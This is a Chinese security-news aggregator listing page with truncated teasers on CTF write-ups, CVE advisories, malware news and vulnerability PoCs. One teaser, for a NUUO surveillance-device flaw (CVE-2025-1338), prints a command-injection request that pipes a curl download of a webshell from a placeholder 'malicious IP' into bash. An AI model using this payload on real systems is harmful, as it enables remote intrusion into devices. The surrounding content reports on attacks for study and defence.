admin 发表的所有文章 | CN-SEC 中文网

安全开发

手搓chrome插件助你提取敏感数据

为什么要通过chrome插件来识别敏感url和对应的敏感数据，其实大家平时在安全测试中有burp或者其他工具可以实现对应能力，但是对于很多非安全测试的人员在做数据安全或者等工作中需要对敏感接口及敏感数...

04月29日8 views评论

阅读全文

程序逆向

黑客游戏 | 记录梦之光芒小游戏的解题过程

偶然看到前辈Monyer所做的小游戏，甚是感慨，从2007年至今已过去18年，期间不断有人经过，留下印记。回望从前，笔者初学时到处查找攻略，到如今可以不看攻略过关，虽然题目不难，但也算见证了时光荏苒。...

04月29日8 views评论

阅读全文

安全文章

DeFiVulnLabs靶场全系列详解（三十一）数字转型时候向下溢出

01—前言此内容仅作为展示Solidity常见错误的概念证明。它严格用于教育目的，不应被解释为鼓励或认可任何形式的非法活动或实际的黑客攻击企图。所提供的信息仅供参考和学习，基于此内容采取的任何行动均由...

04月29日5 views评论

阅读全文

安全文章

通过 OPTIONS 请求+方法走私：HackerOne赏金案例解析

假如服务器对于 OPTIONS 的请求过于‘宽容’，会有怎样的惊喜呢？今天让我们来看一个 HackerOne 上的案例。首先，某网站的端点的请求抓包如下： POST /user/profile/ex...

04月29日9 views评论

阅读全文

安全新闻

网安原创文章推荐【2025/4/27】

2025-04-27 微信公众号精选安全技术文章总览洞见网安 2025-04-27 0x1 【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)弥天安全实验室 2025-04-2...

04月29日15 views评论

阅读全文

CTF专场

UKFC2024 ACTF WP

ACTF为浙江大学AAA战队组织的XCTF分赛。本场赛事累计吸引了来自全球66个国家和地区、510支战队、3422人次参与，365支队伍成功签到。本次比赛，UKFC位列16名。Webnot so we...

04月29日7 views评论

阅读全文

安全新闻

IBM 警告：网络犯罪分子现在更注重窃取凭证，而非使用勒索软件

导读IBM X-Force 2025 威胁情报指数报告显示，网络犯罪分子正在改变其攻击策略。越来越多的黑客不再主要使用勒索软件锁定系统，而是试图悄悄窃取登录信息。IBM 研究了来自 130 多个国家...

04月29日11 views评论

阅读全文

安全新闻

DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞（CVE-2025-0282）攻击日本

导读网络安全研究人员警告称，一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。JPCERT/CC 研究员 Yuma ...

04月29日9 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日60 views评论

阅读全文

安全新闻

立即保护好Clash Verge rev！远程命令执行漏洞公开！

立即保护好Clash Verge rev！远程命令执行漏洞公开！免责声明: 本文仅限学习、研究使用！其他用途责任自负背景信息2天之前clash Verge rev 被爆出存在本地提权漏洞，群友们传的...

04月29日84 views评论

阅读全文

安全漏洞

深澜计费管理系统 down-load 任意文件读取漏洞

内容仅用于学习交流自查使用，由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号Nday Poc及作者不为此承担任何责任，一旦造成后...

04月29日20 views评论

阅读全文

安全新闻

Docker 惊现新型加密挖矿攻击，借 Teneo 平台开辟恶意获利新路径

关键词网络攻击网络安全研究人员详细披露了一场恶意软件攻击活动，该活动采用一种此前未被记录的技术，针对 Docker 环境进行加密货币挖掘。根据 Darktrace 和 Cado Security 的研...

04月29日6 views评论

阅读全文

admin

在线咨询

微信